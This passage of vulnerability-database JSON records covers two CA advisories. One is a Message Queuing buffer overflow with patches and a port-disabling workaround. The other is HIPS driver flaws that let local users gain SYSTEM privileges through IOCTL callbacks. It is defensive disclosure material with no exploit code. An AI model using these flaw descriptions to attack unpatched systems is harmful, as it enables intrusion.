4.0 SP1\nUnicenter TNG 2.1, 2.2, 2.4, 2.4.2\nUnicenter TNG JPN 2.2\n\nAffected Platforms:\nWindows and NetWare\n\nPlatforms NOT affected:\nAIX, AS/400, DG Intel, DG Motorola, DYNIX, HP-UX, IRIX, \nLinux Intel, Linux s/390, MVS, Open VMS, OS/2, OSF1, \nSolaris Intel, Solaris Sparc and UnixWare. \n\nStatus and Recommendation:\nCA has made patches available for all affected products. These \npatches are independent of the CA Software that installed CAM. \nSimply select the patch appropriate to the platform, and the \ninstalled version of CAM, and follow the patch application \ninstructions. You should also review the product home pages on \nSupportConnect for any additional product specific instructions. \n\nSolutions for CAM:\nPlatform Solution\nWindows QO89945\nNetWare QO89943\n\nHow to determine if you are affected:\n\nDetermining CAM versions:\nSimply running camstat will return the version information in the \ntop line of the output on any platform. The camstat command is \nlocated in the bin subfolder of the installation directory. \n\nThe example below indicates that CAM version 1.11 build 27 \nincrement 2 is running. \n\n E:\\\u003ecamstat\n CAM \u2013 machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16\n\nDetermining the CAM install directory:\n\nWindows: The install location is specified by the %CAI_MSQ% \n environment variable. \nUnix/Linux/Mac: The /etc/catngcampath text file holds the CAM \n install location. \n\nWorkaround:\nThe affected listening port can be disabled by creating or \nupdating CAM\u0027s configuration file, CAM.CFG, with the following \nentry under the \"*CONFIG\" section:\n\n *CONFIG\n cas_port=0\n\nThe CA Messaging Server must be recycled in order for this to take \neffect. We advise that products dependent upon CAM should be \nshutdown prior to recycling CAM. Once dependent products have \nbeen shutdown, CAM can be recycled with the following commands:\n\n On Windows:\n camclose\n cam start\n\n On NetWare:\n load camclose\n load cam start\n\nOnce CAM has been restarted, any CAM dependent products that were \nshutdown can be restarted. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFGpqCHeSWR3+KUGYURAt6DAJ0YpnaiwrNfhhQlvdvL28LYxBYbZgCfRpKQ\npNdOPBvd1/BVRF6Lo65uo2o=\n=7w0f\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-0060",
"trust": 2.9
},
{
"db": "BID",
"id": "25051",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "26190",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1018449",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2007-2638",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "58025",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-23422",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58028",
"trust": 0.1
},
{
"db": "XF",
"id": "32234",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"id": "VAR-200707-0544",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:21:45.023000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Notice for CA Message Queuing (CAM / CAFT) vulnerability",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=149849"
},
{
"title": "CA Repair Measures for Security Vulnerabilities of Message Queuing Server",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146846"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149809"
},
{
"trust": 1.8,
"url": "http://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-secnot.asp"
},
{
"trust": 1.8,
"url": "http://www.iss.net/threats/272.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/25051"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474602/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018449"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/26190"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2007/2638"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32234"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-0060"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-0060"
},
{
"trust": 0.4,
"url": "http://iss.net/threats/272.html"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/474602"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5594/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1682/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89943"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5578/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26190/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89945"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5597/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-0060"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35527"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-s"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/32234"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-26T00:00:00",
"db": "VULHUB",
"id": "VHN-23422"
},
{
"date": "2007-07-24T00:00:00",
"db": "BID",
"id": "25051"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"date": "2007-07-26T04:26:32",
"db": "PACKETSTORM",
"id": "58028"
},
{
"date": "2007-07-25T04:52:10",
"db": "PACKETSTORM",
"id": "58025"
},
{
"date": "2007-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"date": "2007-07-26T00:30:00",
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-23422"
},
{
"date": "2007-07-27T15:35:00",
"db": "BID",
"id": "25051"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Used in products Message Queuing Server Vulnerable to stack-based buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
],
"trust": 0.6
}
}
VAR-200701-0265
Vulnerability from variot - Updated: 2025-04-10 23:09Computer Associates Host Intrusion Prevention System (HIPS) drivers (1) Core kmxstart.sys 6.5.4.31 and (2) Firewall kmxfw.sys 6.5.4.10 allow local users to gain privileges by using certain privileged IOCTLs to modify callback function pointers. Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities. An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers. These isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. There is a problem in the implementation of the driver of CA HIPS products, and local attackers may use this vulnerability to elevate their privileges.
To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German.
The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios.
This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links
Read the full description: http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l
TITLE: CA Personal Firewall HIPS Drivers Privilege Escalation
SECUNIA ADVISORY ID: SA22972
VERIFY ADVISORY: http://secunia.com/advisories/22972/
CRITICAL: Less critical
IMPACT: Privilege escalation
WHERE: Local system
SOFTWARE: CA Personal Firewall 2007 9.x http://secunia.com/product/12660/
DESCRIPTION: Rub\xe9n Santamarta has reported some vulnerabilities in CA Personal Firewall, which can be exploited by malicious people to gain escalated privileges.
The vulnerabilities are caused due to errors in the HIPS Core (KmxStart.sys) and HIPS Firewall (KmxFw.sys) drivers. This can be exploited to modify some implemented callbacks via certain privileged IOCTLs. Other versions and products may also be affected.
SOLUTION: Grant only trusted users access to affected systems.
The vendor is reportedly working on the patches.
PROVIDED AND/OR DISCOVERED BY: Rub\xe9n Santamarta, reversemode.com.
ORIGINAL ADVISORY: Reversemode.com: http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=38
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Local attackers can exploit these vulnerabilities to gain escalated privileges.
Mitigating Factors: Local user account required for exploitation.
Severity: CA has given these vulnerability issues a Medium risk rating. Customers running one of the affected products simply need to ensure that they have allowed this automatic update to take place.
Determining if you are affected: To ensure that the update has taken place, customers can view the Help > About screen in their CA Personal Firewall product and confirm that their engine version number is 1.0.176 or higher. http://marc.theaimsgroup.com/?l=bugtraq&m=116379521731676&w=2
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln@ca.com.
If you discover a vulnerability in CA products, please report your findings to vuln@ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, One CA Plaza, Islandia, NY 11749
Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright (c) 2007 CA. All rights reserved
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200701-0265",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "firewall_6.5.4.10"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "core_6.5.4.31"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "core kmxstart.sys 6.5.4.31"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "firewall kmxfw.sys 6.5.4.10"
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20070"
}
],
"sources": [
{
"db": "BID",
"id": "21140"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:host-based_intrusion_prevention_system",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rub\u00e9n Santamarta",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
}
],
"trust": 0.6
},
"cve": "CVE-2006-6952",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2006-6952",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-23060",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-6952",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2006-6952",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200701-407",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-23060",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407"
},
{
"db": "NVD",
"id": "CVE-2006-6952"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Host Intrusion Prevention System (HIPS) drivers (1) Core kmxstart.sys 6.5.4.31 and (2) Firewall kmxfw.sys 6.5.4.10 allow local users to gain privileges by using certain privileged IOCTLs to modify callback function pointers. Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities. \nAn attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers. \nThese isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. There is a problem in the implementation of the driver of CA HIPS products, and local attackers may use this vulnerability to elevate their privileges. \n\n----------------------------------------------------------------------\n\nTo improve our services to our customers, we have made a number of\nadditions to the Secunia Advisories and have started translating the\nadvisories to German. \n\nThe improvements will help our customers to get a better\nunderstanding of how we reached our conclusions, how it was rated,\nour thoughts on exploitation, attack vectors, and scenarios. \n\nThis includes:\n* Reason for rating\n* Extended description\n* Extended solution\n* Exploit code or links to exploit code\n* Deep links\n\nRead the full description:\nhttp://corporate.secunia.com/products/48/?r=l\n\nContact Secunia Sales for more information:\nhttp://corporate.secunia.com/how_to_buy/15/?r=l\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Personal Firewall HIPS Drivers Privilege Escalation\n\nSECUNIA ADVISORY ID:\nSA22972\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/22972/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nPrivilege escalation\n\nWHERE:\nLocal system\n\nSOFTWARE:\nCA Personal Firewall 2007 9.x\nhttp://secunia.com/product/12660/\n\nDESCRIPTION:\nRub\\xe9n Santamarta has reported some vulnerabilities in CA Personal\nFirewall, which can be exploited by malicious people to gain\nescalated privileges. \n\nThe vulnerabilities are caused due to errors in the HIPS Core\n(KmxStart.sys) and HIPS Firewall (KmxFw.sys) drivers. This can be\nexploited to modify some implemented callbacks via certain privileged\nIOCTLs. Other versions and products may also be affected. \n\nSOLUTION:\nGrant only trusted users access to affected systems. \n\nThe vendor is reportedly working on the patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nRub\\xe9n Santamarta, reversemode.com. \n\nORIGINAL ADVISORY:\nReversemode.com:\nhttp://www.reversemode.com/index.php?option=com_remository\u0026Itemid=2\u0026func=fileinfo\u0026id=38\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Local attackers can exploit these vulnerabilities to gain \nescalated privileges. \n\nMitigating Factors: Local user account required for exploitation. \n\nSeverity: CA has given these vulnerability issues a Medium risk \nrating. Customers running one of the affected products \nsimply need to ensure that they have allowed this automatic update \nto take place. \n\nDetermining if you are affected:\nTo ensure that the update has taken place, customers can view the \nHelp \u003e About screen in their CA Personal Firewall product and \nconfirm that their engine version number is 1.0.176 or higher. \nhttp://marc.theaimsgroup.com/?l=bugtraq\u0026m=116379521731676\u0026w=2\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA \nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory,\nplease send email to vuln@ca.com. \n\nIf you discover a vulnerability in CA products, please report\nyour findings to vuln@ca.com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, One CA Plaza, Islandia, NY 11749\n\t\nContact http://www3.ca.com/contact/\nLegal Notice http://www3.ca.com/legal/\nPrivacy Policy http://www3.ca.com/privacy/\nCopyright (c) 2007 CA. All rights reserved",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-6952"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244"
},
{
"db": "BID",
"id": "21140"
},
{
"db": "VULHUB",
"id": "VHN-23060"
},
{
"db": "PACKETSTORM",
"id": "52231"
},
{
"db": "PACKETSTORM",
"id": "53998"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-23060",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23060"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-6952",
"trust": 2.9
},
{
"db": "BID",
"id": "21140",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "22972",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "30497",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "30498",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001244",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200701-407",
"trust": 0.7
},
{
"db": "BUGTRAQ",
